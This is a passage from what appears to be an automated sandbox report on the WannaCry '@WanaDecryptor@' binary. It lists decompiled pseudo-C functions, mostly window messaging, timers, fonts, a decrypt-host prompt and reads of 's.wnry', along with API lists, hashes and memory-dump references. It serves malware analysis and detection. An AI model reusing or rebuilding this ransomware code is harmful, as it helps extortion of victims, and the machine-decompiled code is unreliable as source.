				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}





















                                                      0x00407f88
                                                      0x00407f96
                                                      0x00407f9b
                                                      0x00407f9b
                                                      0x00407f9d
                                                      0x00407fa9
                                                      0x00407fbb
                                                      0x00407fbd
                                                      0x00407fc3
                                                      0x00407fc5
                                                      0x00407fc8
                                                      0x00407fca
                                                      0x00407fdd
                                                      0x00407fe4
                                                      0x00407ffd
                                                      0x00408006
                                                      0x0040800a
                                                      0x0040800b
                                                      0x00408011
                                                      0x00408016
                                                      0x00408017
                                                      0x00408018
                                                      0x0040801d
                                                      0x00408020
                                                      0x00408022
                                                      0x00408027
                                                      0x0040802a
                                                      0x00408034
                                                      0x00408035
                                                      0x0040803a
                                                      0x0040803b
                                                      0x0040803c
                                                      0x00408041
                                                      0x00408044
                                                      0x00408044
                                                      0x00408046
                                                      0x0040804e
                                                      0x00408057
                                                      0x00408059
                                                      0x0040805d
                                                      0x00408061
                                                      0x0040806a
                                                      0x0040806e
                                                      0x00408072
                                                      0x0040807b
                                                      0x0040807d
                                                      0x00408089
                                                      0x00408093
                                                      0x004080a0
                                                      0x00000000
                                                      0x004080a7
                                                      0x00408072
                                                      0x00408061
                                                      0x0040804e
                                                      0x004080b3

                                                      APIs
                                                      • fopen.MSVCRT ref: 00407FBD
                                                      • fread.MSVCRT ref: 00407FDD
                                                      • fclose.MSVCRT ref: 00407FE4
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                                        • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy$fclosefopenfread
                                                      • String ID: +++$00000000.res$s.wnry
                                                      • API String ID: 3363958884-869915597
                                                      • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                                      • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401220 Relevance: 10.6, APIs: 7, Instructions: 53windowtimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00401220(void* __ecx, long _a4) {
				long _t11;
				void* _t26;

				_t11 = _a4;
				_t26 = __ecx;
				if(_t11 != 0x3e9) {
					L8:
					L00412CBC();
					return _t11;
				}
				if( *((intOrPtr*)(__ecx + 0xa8)) != 0) {
					SendMessageA( *(__ecx + 0x80), 0x402, 0x28, 0);
					KillTimer( *(_t26 + 0x20), 0x3e9);
					L00412B66();
				}
				if(SendMessageA( *(_t26 + 0x80), 0x408, 0, 0) <  *((intOrPtr*)(_t26 + 0xb0))) {
					SendMessageA( *(_t26 + 0x80), 0x405, 0, 0);
				}
				_t11 =  *(_t26 + 0xa0);
				if(_t11 == 0) {
					_t11 = SendMessageA( *(_t26 + 0x80), 0x408, 0, 0);
					if(_t11 == 0xf) {
						 *((intOrPtr*)(_t26 + 0xa8)) = 0xffffffff;
					}
				}
				goto L8;
			}





                                                      0x00401220
                                                      0x0040122b
                                                      0x0040122d
                                                      0x004012c2
                                                      0x004012c4
                                                      0x004012cb
                                                      0x004012cb
                                                      0x00401241
                                                      0x00401253
                                                      0x0040125e
                                                      0x00401266
                                                      0x00401266
                                                      0x00401283
                                                      0x00401295
                                                      0x00401295
                                                      0x00401297
                                                      0x0040129f
                                                      0x004012b1
                                                      0x004012b6
                                                      0x004012b8
                                                      0x004012b8
                                                      0x004012b6
                                                      0x00000000

                                                      APIs
                                                      • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
                                                      • KillTimer.USER32(?,000003E9), ref: 0040125E
                                                      • #4853.MFC42 ref: 00401266
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
                                                      • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
                                                      • #2379.MFC42 ref: 004012C4
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#2379#4853KillTimer
                                                      • String ID:
                                                      • API String ID: 178170520-0
                                                      • Opcode ID: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction ID: aacaf11b8525f3fa08346ebc997e4185e7a595c9bc7dc659aa73715d177cc548
                                                      • Opcode Fuzzy Hash: b77cb0015e8fab117b1368574dbf11fadefe02a27d4ed6d688f80b57d7754396
                                                      • Instruction Fuzzy Hash: FD114475340B00ABD6709A74CD41F6BB3D4BB94B10F20892DF395FB2D0DAB4B8068B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43windowthreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}







                                                      0x00403861
                                                      0x0040387a
                                                      0x0040387f
                                                      0x00403881
                                                      0x0040389f
                                                      0x004038a3
                                                      0x004038b5
                                                      0x004038c5
                                                      0x004038cb
                                                      0x00000000
                                                      0x004038cb
                                                      0x004038d3
                                                      0x00403883
                                                      0x00403883
                                                      0x00403885
                                                      0x0040388a
                                                      0x00403891
                                                      0x00403891

                                                      APIs
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                                      • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                                      • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                                      Strings
                                                      • Please select a host to decrypt., xrefs: 00403885
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1200CreateThread
                                                      • String ID: Please select a host to decrypt.
                                                      • API String ID: 3616405048-3459725315
                                                      • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                                      • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}








                                                      0x004044c0
                                                      0x004044ca
                                                      0x004044cc
                                                      0x004044f8
                                                      0x00404503
                                                      0x0040450d
                                                      0x00404513
                                                      0x00404519
                                                      0x0040451d
                                                      0x00404522
                                                      0x00000000
                                                      0x00404522
                                                      0x004044d2
                                                      0x004044d8
                                                      0x004044d9
                                                      0x004044e8
                                                      0x004044ee
                                                      0x004044ef
                                                      0x004044f6
                                                      0x00000000
                                                      0x00000000
                                                      0x0040452a

                                                      APIs
                                                      • GetParent.USER32(?), ref: 004044D2
                                                      • #2864.MFC42(00000000), ref: 004044D9
                                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                      • #2860.MFC42(00000000), ref: 004044EF
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                      • CreateFontIndirectA.GDI32(?), ref: 00404513
                                                      • #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 2724197214-0
                                                      • Opcode ID: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                                      • Opcode Fuzzy Hash: 0c94b8f5f5be19309df2c112ac17aff14f3c349f99fc29199b1274657e014969
                                                      • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t75;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_t65 =  *0x422210; // 0xab4238
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_t69 =  *0x422210; // 0xab4238
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							_t70 =  *0x422210; // 0xab4238
							 *((intOrPtr*)( *_t70 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							_t73 =  *0x422210; // 0xab4238
							 *((intOrPtr*)( *_t73 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						_t75 =  *0x422210; // 0xab4238
						 *((intOrPtr*)( *_t75 + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}
















                                                      0x0040c066
                                                      0x0040c068
                                                      0x0040c073
                                                      0x0040c07a
                                                      0x0040c07f
                                                      0x0040c08b
                                                      0x0040c0a2
                                                      0x0040c0ad
                                                      0x0040c0b2
                                                      0x0040c0b5
                                                      0x0040c0ba
                                                      0x0040c0bf
                                                      0x0040c0e7
                                                      0x0040c0f6
                                                      0x0040c102
                                                      0x0040c102
                                                      0x0040c111
                                                      0x0040c116
                                                      0x0040c11c
                                                      0x0040c129
                                                      0x0040c139
                                                      0x0040c13a
                                                      0x0040c142
                                                      0x0040c17d
                                                      0x0040c189
                                                      0x0040c189
                                                      0x0040c18b
                                                      0x0040c195
                                                      0x0040c19d
                                                      0x0040c19e
                                                      0x0040c1ac
                                                      0x0040c1b2
                                                      0x0040c1ed
                                                      0x0040c1ef
                                                      0x0040c1ef
                                                      0x0040c1f3
                                                      0x0040c1fe
                                                      0x0040c1fe
                                                      0x0040c200
                                                      0x0040c208
                                                      0x0040c20b
                                                      0x00000000
                                                      0x0040c1b4
                                                      0x0040c1b6
                                                      0x0040c1c2
                                                      0x0040c1c2
                                                      0x0040c1c4
                                                      0x0040c1cc
                                                      0x0040c1d3
                                                      0x0040c1e3
                                                      0x0040c1e3
                                                      0x0040c144
                                                      0x0040c146
                                                      0x0040c152
                                                      0x0040c152
                                                      0x0040c154
                                                      0x0040c15c
                                                      0x0040c163
                                                      0x0040c173
                                                      0x0040c173
                                                      0x0040c0c1
                                                      0x0040c0c1
                                                      0x0040c0ca
                                                      0x0040c0d5
                                                      0x0040c0d5
                                                      0x0040c0db
                                                      0x0040c216
                                                      0x0040c21a
                                                      0x0040c21f
                                                      0x0040c21f
                                                      0x0040c22b
                                                      0x0040c238

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823
                                                      • String ID:
                                                      • API String ID: 3019263841-0
                                                      • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                                      • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}




















                                                      0x00409c25
                                                      0x00409c27
                                                      0x00409c2c
                                                      0x00409c34
                                                      0x00409c4a
                                                      0x00409c4b
                                                      0x00409c4e
                                                      0x00409c59
                                                      0x00409c98
                                                      0x00409c9c
                                                      0x00409c5b
                                                      0x00409c5b
                                                      0x00409c68
                                                      0x00409c6e
                                                      0x00409c72
                                                      0x00409c76
                                                      0x00409c78
                                                      0x00409c7b
                                                      0x00409c84
                                                      0x00409c86
                                                      0x00409c86
                                                      0x00409c84
                                                      0x00409c8d
                                                      0x00409c94
                                                      0x00409c94
                                                      0x00409ca0
                                                      0x00409ca3
                                                      0x00409ca8
                                                      0x00409ce6
                                                      0x00409cf0
                                                      0x00409cf0
                                                      0x00409caa
                                                      0x00409cb2
                                                      0x00409cb6
                                                      0x00409cb8
                                                      0x00409cb8
                                                      0x00409cc0
                                                      0x00409cc2
                                                      0x00409cd4
                                                      0x00409cd9
                                                      0x00409cdd
                                                      0x00409cc4
                                                      0x00409cc4
                                                      0x00409cc6
                                                      0x00409ccd
                                                      0x00409ccd
                                                      0x00409cc2
                                                      0x00409cf9
                                                      0x00409cff
                                                      0x00409d03
                                                      0x00409d06
                                                      0x00409d08
                                                      0x00409d08
                                                      0x00409d24
                                                      0x00409d2f
                                                      0x00409c37
                                                      0x00409c3d
                                                      0x00409c3d

                                                      APIs
                                                      • #3797.MFC42 ref: 00409C27
                                                      • #6734.MFC42(?,?), ref: 00409C4E
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                                      • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3797#4284#6734MessageSend
                                                      • String ID:
                                                      • API String ID: 1776784669-0
                                                      • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                                      • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}




















                                                      0x004127e0
                                                      0x004127e2
                                                      0x004127e7
                                                      0x004127ed
                                                      0x004127ee
                                                      0x004127f5
                                                      0x004127f8
                                                      0x004127fd
                                                      0x00412802
